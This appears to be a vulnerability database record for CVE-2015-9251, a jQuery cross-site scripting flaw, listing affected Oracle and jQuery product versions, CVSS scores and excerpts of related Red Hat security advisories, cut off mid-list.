Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201801-0036", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "weblogic server", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3", }, { model: "weblogic server", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.3.0", }, { model: "service bus", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: 
"service bus", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "retail workforce management software", scope: "eq", trust: 1.3, vendor: "oracle", version: "1.60.9", }, { model: "retail sales audit", scope: "eq", trust: 1.3, vendor: "oracle", version: "15.0", }, { model: "retail invoice matching", scope: "eq", trust: 1.3, vendor: "oracle", version: "15.0", }, { model: "retail customer insights", scope: "eq", trust: 1.3, vendor: "oracle", version: "16.0", }, { model: "retail customer insights", scope: "eq", trust: 1.3, vendor: "oracle", version: "15.0", }, { model: "retail allocation", scope: "eq", trust: 1.3, vendor: "oracle", version: "15.0.2", }, { model: "primavera unifier", scope: "eq", trust: 1.3, vendor: "oracle", version: "18.8", }, { model: "primavera unifier", scope: "eq", trust: 1.3, vendor: "oracle", version: "16.2", }, { model: "primavera unifier", scope: "eq", trust: 1.3, vendor: "oracle", version: "16.1", }, { model: "primavera gateway", scope: "eq", trust: 1.3, vendor: "oracle", version: "17.12", }, { model: "primavera gateway", scope: "eq", trust: 1.3, vendor: "oracle", version: "16.2", }, { model: "primavera gateway", scope: "eq", trust: 1.3, vendor: "oracle", version: "15.2", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.57", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.56", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.55", }, { model: "oss support tools", scope: "eq", trust: 1.3, vendor: "oracle", version: "19.1", }, { model: "jdeveloper", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "jdeveloper", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "jdeveloper", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", 
trust: 1.3, vendor: "oracle", version: "9.2", }, { model: "insurance insbridge rating and underwriting", scope: "eq", trust: 1.3, vendor: "oracle", version: "5.5", }, { model: "insurance insbridge rating and underwriting", scope: "eq", trust: 1.3, vendor: "oracle", version: "5.4", }, { model: "insurance insbridge rating and underwriting", scope: "eq", trust: 1.3, vendor: "oracle", version: "5.2", }, { model: "hospitality materials control", scope: "eq", trust: 1.3, vendor: "oracle", version: "18.1", }, { model: "hospitality guest access", scope: "eq", trust: 1.3, vendor: "oracle", version: "4.2.1", }, { model: "healthcare foundation", scope: "eq", trust: 1.3, vendor: "oracle", version: "7.2", }, { model: "healthcare foundation", scope: "eq", trust: 1.3, vendor: "oracle", version: "7.1", }, { model: "fusion middleware mapviewer", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "financial services reconciliation framework", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.0.6", }, { model: "financial services reconciliation framework", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services market risk measurement and management", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.0.6", }, { model: "financial services market risk measurement and management", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.0.5", }, { model: "enterprise operations monitor", scope: "eq", trust: 1.3, vendor: "oracle", version: "4.0", }, { model: "enterprise operations monitor", scope: "eq", trust: 1.3, vendor: "oracle", version: "3.4", }, { model: "enterprise manager ops center", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.3.3", }, { model: "enterprise manager ops center", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.2", }, { model: "communications interactive session recorder", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.2", }, { model: "communications interactive 
session recorder", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.1", }, { model: "communications interactive session recorder", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.0", }, { model: "business process management suite", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "business process management suite", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "business process management suite", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "banking platform", scope: "eq", trust: 1.3, vendor: "oracle", version: "2.6.2", }, { model: "banking platform", scope: "eq", trust: 1.3, vendor: "oracle", version: "2.6.1", }, { model: "agile product lifecycle management for process", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.2.3.1", }, { model: "agile product lifecycle management for process", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.2.3.0", }, { model: "agile product lifecycle management for process", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.2.2.0", }, { model: "agile product lifecycle management for process", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.2.1.0", }, { model: "agile product lifecycle management for process", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.2.0.0", }, { model: "endeca information discovery studio", scope: "eq", trust: 1, vendor: "oracle", version: "3.2.0", }, { model: "financial services loan loss forecasting and provisioning", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "hospitality cruise fleet management", scope: "eq", trust: 1, vendor: "oracle", version: "9.0.11", }, { model: "financial services asset liability management", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "financial services profitability management", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services profitability 
management", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.4", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "7.3.5", }, { model: "utilities framework", scope: "lte", trust: 1, vendor: "oracle", version: "4.3.0.4", }, { model: "financial services asset liability management", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.4", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.6.0", }, { model: "financial services data integration hub", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "healthcare translational research", scope: "eq", trust: 1, vendor: "oracle", version: "3.1.0", }, { model: "hospitality guest access", scope: "eq", trust: 1, vendor: "oracle", version: "4.2.0", }, { model: "communications converged application server", scope: "lt", trust: 1, vendor: "oracle", version: "7.0.0.1", }, { model: "endeca information discovery studio", scope: "eq", trust: 1, vendor: "oracle", version: "3.1.0", }, { model: "siebel ui framework", scope: "eq", trust: 1, vendor: "oracle", version: "18.10", }, { model: "utilities framework", scope: "gte", trust: 1, vendor: "oracle", version: "4.3.0.1", }, { model: "financial services funds transfer pricing", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "hospitality reporting and analytics", scope: "eq", trust: 1, vendor: "oracle", version: "9.1.0", }, { model: "primavera unifier", scope: "gte", trust: 1, vendor: "oracle", version: "17.1", }, { model: "primavera unifier", scope: "lte", trust: 1, vendor: "oracle", version: "17.12", }, { model: "jquery", scope: "lt", trust: 1, vendor: "jquery", version: "3.0.0", }, { model: "utilities mobile workforce management", scope: "eq", trust: 1, vendor: "oracle", version: "2.3.0", }, { model: "financial services loan loss forecasting and provisioning", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.2", }, 
{ model: "communications webrtc session controller", scope: "lt", trust: 1, vendor: "oracle", version: "7.2", }, { model: "financial services hedge management and ifrs valuations", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "webcenter sites", scope: "eq", trust: 1, vendor: "oracle", version: "11.1.1.8.0", }, { model: "retail workforce management software", scope: "eq", trust: 1, vendor: "oracle", version: "1.64.0", }, { model: "financial services data integration hub", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.5", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "financial services funds transfer pricing", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.4", }, { model: "financial services liquidity risk management", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.2", }, { model: "siebel ui framework", scope: "eq", trust: 1, vendor: "oracle", version: "18.11", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "7.3.3", }, { model: "financial services liquidity risk management", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services hedge management and ifrs valuations", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.4", }, { model: "communications services gatekeeper", scope: "lt", trust: 1, vendor: "oracle", version: "6.1.0.4.0", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0", }, { model: "real-time scheduler", scope: "eq", trust: 1, vendor: "oracle", version: "2.3.0", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.6.3", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.6.2", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.6.1", 
}, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.4.2", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.8.1", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.8.0", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.7.2", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.7.1", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.6.4", }, { model: "jquery", scope: "eq", trust: 0.9, vendor: "jquery", version: "1.6", }, { model: "jquery", scope: "eq", trust: 0.8, vendor: "jquery", version: "3.0.0", }, { model: "jquery", scope: "eq", trust: 0.8, vendor: "jquery", version: null, }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "utilities mobile workforce management", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.4", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1", }, { model: "retail workforce management software", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.64", }, { model: "real-time scheduler", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0.0", }, { model: "primavera unifier", scope: "eq", trust: 0.3, vendor: "oracle", version: "17.7", }, { model: "primavera unifier", scope: "eq", trust: 0.3, vendor: "oracle", version: "17.12", }, { model: "hospitality reporting and analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "hospitality guest access", scope: 
"eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "healthcare translational research", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1", }, { model: "financial services profitability management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.6", }, { model: "financial services profitability management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services profitability management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.7", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.3", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.2", }, { model: "financial services liquidity risk management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.6", }, { model: "financial services liquidity risk management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services liquidity risk management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.2", }, { model: "financial services hedge management and ifrs valuations", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.7", }, { model: "financial services hedge management and ifrs valuations", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services hedge management and ifrs valuations", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services funds transfer 
pricing", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.7", }, { model: "financial services funds transfer pricing", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services funds transfer pricing", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services data integration hub", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.7", }, { model: "financial services data integration hub", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services asset liability management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.7", }, { model: "financial services asset liability management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services asset liability management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.7", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.6", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.5", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.4", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.3", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.2", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.1", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "financial 
services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.4", }, { model: "financial services analytical applications infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.3", }, { model: "endeca information discovery studio", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "endeca information discovery studio", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1", }, { model: "diagnostic assistant", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.12", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.1", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications converged application server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications application session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.8", }, { model: "communications application session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.7.1", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.4.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.6", }, { model: "jquery", scope: "eq", trust: 0.3, vendor: "jquery", version: "1.9", }, { model: "jquery", scope: "eq", trust: 0.3, vendor: "jquery", version: "1.2.6", }, { model: "jquery", scope: "eq", trust: 0.3, vendor: "jquery", version: "2.2", }, { model: "jquery", scope: "eq", trust: 0.3, vendor: "jquery", version: "2.1", }, { model: "intouch access anywhere update", scope: 
"eq", trust: 0.3, vendor: "aveva", version: "20172", }, { model: "intouch access anywhere", scope: "eq", trust: 0.3, vendor: "aveva", version: "2017", }, { model: "diagnostic assistant", scope: "ne", trust: 0.3, vendor: "oracle", version: "2.12.36", }, { model: "communications webrtc session controller", scope: "ne", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications converged application server", scope: "ne", trust: 0.3, vendor: "oracle", version: "7.0.0.1", }, { model: "jquery", scope: "ne", trust: 0.3, vendor: "jquery", version: "3.0", }, { model: "intouch access anywhere update 2b", scope: "ne", trust: 0.3, vendor: "aveva", version: "2017", }, ], sources: [ { db: "BID", id: "105658", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "CNNVD", id: "CNNVD-201801-798", }, { db: "NVD", id: "CVE-2015-9251", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "John Martinelli,Red Hat,Oleg Gaidarenko,SECURELI.com", sources: [ { db: "CNNVD", id: "CNNVD-201801-798", }, ], trust: 0.6, }, cve: "CVE-2015-9251", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "NONE", 
baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "CVE-2015-9251", impactScore: 2.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 1.8, vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N", version: "2.0", }, { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "VHN-87212", impactScore: 2.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", exploitabilityScore: 2.8, id: "CVE-2015-9251", impactScore: 2.7, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", trust: 1.8, userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2015-9251", trust: 1, value: "MEDIUM", }, { author: "NVD", id: "CVE-2015-9251", trust: 0.8, value: "Medium", }, { author: "CNNVD", id: "CNNVD-201801-798", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-87212", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-87212", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "CNNVD", id: "CNNVD-201801-798", }, { db: "NVD", id: "CVE-2015-9251", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed. 
jQuery contains a cross-site scripting vulnerability. Information may be obtained and information may be tampered with. jQuery is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. \nVersions prior to jQuery 3.0.0 are vulnerable. jQuery is an open source, cross-browser JavaScript library developed by the American programmer John Resig. The library simplifies the interaction between HTML and JavaScript, and is modular and extensible through plug-ins. The vulnerability stems from the lack of correct validation of client data in web applications. An attacker could exploit this vulnerability to execute code on the client. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. 
JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001\nJBEAP-23865 - [GSS](7.4.z) Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001\nJBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001\nJBEAP-23928 - Tracker bug for the EAP 7.4.9 release for RHEL-9\nJBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001\nJBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001\nJBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001\nJBEAP-24100 - [GSS](7.4.z) Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001\nJBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value\nJBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001\nJBEAP-24132 - [GSS](7.4.z) Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001\nJBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001\nJBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002\nJBEAP-24191 - [GSS](7.4.z) Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001\nJBEAP-24195 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001\nJBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003\nJBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2\nJBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001\nJBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001\n\n7. 
Description:\n\nRed Hat Fuse provides a small-footprint, flexible, open source enterprise\nservice bus and integration platform. Red Hat A-MQ is a standards compliant\nmessaging system that is tailored for use in mission critical applications. It\nincludes bug fixes, which are documented in the patch notes accompanying\nthe package on the download page. See the download link given in the\nreferences section below. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nInstallation instructions are located in the download section of the\ncustomer portal. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: idm:DL1 and idm:client security, bug fix, and enhancement update\nAdvisory ID: RHSA-2020:4670-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:4670\nIssue date: 2020-11-03\nCVE Names: CVE-2015-9251 CVE-2016-10735 CVE-2018-14040\n CVE-2018-14042 CVE-2018-20676 CVE-2018-20677\n CVE-2019-8331 CVE-2019-11358 CVE-2020-1722\n CVE-2020-11022\n====================================================================\n1. Summary:\n\nAn update for the idm:DL1 and idm:client modules is now available for Red\nHat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. 
Description:\n\nRed Hat Identity Management (IdM) is a centralized authentication, identity\nmanagement, and authorization solution for both traditional and cloud-based\nenterprise environments. \n\nThe following packages have been upgraded to a later upstream version: ipa\n(4.8.7), softhsm (2.6.0), opendnssec (2.1.6). (BZ#1759888, BZ#1818765,\nBZ#1818877)\n\nSecurity Fix(es):\n\n* js-jquery: Cross-site scripting via cross-domain ajax requests\n(CVE-2015-9251)\n\n* bootstrap: XSS in the data-target attribute (CVE-2016-10735)\n\n* bootstrap: Cross-site Scripting (XSS) in the collapse data-parent\nattribute (CVE-2018-14040)\n\n* bootstrap: Cross-site Scripting (XSS) in the data-container property of\ntooltip (CVE-2018-14042)\n\n* bootstrap: XSS in the tooltip data-viewport attribute (CVE-2018-20676)\n\n* bootstrap: XSS in the affix configuration target property\n(CVE-2018-20677)\n\n* bootstrap: XSS in the tooltip or popover data-template attribute\n(CVE-2019-8331)\n\n* js-jquery: Prototype pollution in object's prototype leading to denial of\nservice, remote code execution, or property injection (CVE-2019-11358)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter\nmethod (CVE-2020-11022)\n\n* ipa: No password length restriction leads to denial of service\n(CVE-2020-1722)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.3 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1430365 - [RFE] Host-group names command rename\n1488732 - fake_mname in named.conf is no longer effective\n1585020 - Enable compat tree to provide information about AD users and groups on trust agents\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1651577 - [WebUI] IPA Error 3007: RequirmentError\" while adding members in \"User ID overrides\" tab\n1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute\n1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1701233 - [RFE] support setting supported signature methods on the token\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection\n1746830 - Memory leak during search of idview overrides\n1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch\n1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming\n1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn't work in GUI (it works only from CLI)\n1759888 - Rebase OpenDNSSEC to 2.1\n1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED\n1777806 - When Service weight is set as 0 for server in IPA location \"IPA Error 903: InternalError\" is displayed\n1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service\n1801698 - [RFE] Changing default hostgroup is too easy\n1802471 - SELinux policy for ipa-custodia\n1809835 - RFE: ipa group-add-member: number of failed should 
